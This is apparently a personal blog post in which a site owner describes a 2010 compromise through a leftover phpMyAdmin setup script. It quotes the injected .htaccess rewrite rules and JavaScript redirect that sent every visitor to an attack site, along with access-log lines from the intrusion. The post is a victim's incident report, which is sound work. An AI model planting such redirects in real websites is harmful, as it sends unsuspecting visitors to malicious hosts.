I've been hacked!

Today – at 4:26pm (server time) my site was hacked.

 All pages on the site were redirecting to http://webarh.com/z.php (don't go there – it's an attack site – the buggers.)

 After trying to figure out how hey got in – I found that my server (which is a VPS) has PhpMySQL installed as a default in apache to attach to the alias of /myadmin.  They (the hackors/bot/whatev) attached through a BASIC DEFAULT INSTALL SCRIPT THE MORONS LEFT OPEN.  There.  I feel a bit better.

Okay – I've removed the GAPING WIDE HOLE in my server by removing the unwanted application and restored the site from backups.  Since it's only been hijacked for just under four hours, I am hoping not too many people have been affected (mainly the search bots which will tag the site as infected).

I really can't believe that the installation script was left after the system admins made the image for my VPS.  Really dumb.  As a user of the hosting – I wasn't even aware that the addition of an apache alias was even installed.  I've been hacked because of my own stupidity before – and I find it annoying – but being hacked because of someone else's mistake is extremely aggravating. 

The final attacked updated all .htaccess files to include:

RewriteEngine On
RewriteBase /
RewriteRule ^(.*)? http://webarh.com/z.php

 

And they inserted the following in the base of the index.php and index.html files for each folder:

<script>document.location.href='http://webarh.com/z.php';</script>

 

The log files show a single GET and then POST to the file:

174.129.214.209 – – [17/Oct/2010:16:26:38 -0400] "GET /myadmin/scripts/setup.php HTTP/1.1" 200 14060 "-" "-"
174.129.214.209 – – [17/Oct/2010:16:26:38 -0400] "POST /myadmin/scripts/setup.php HTTP/1.1" 200 – "-" "-"
 

That's it.  That's the hacker.   The host manager has been notified.

 


Comments are closed.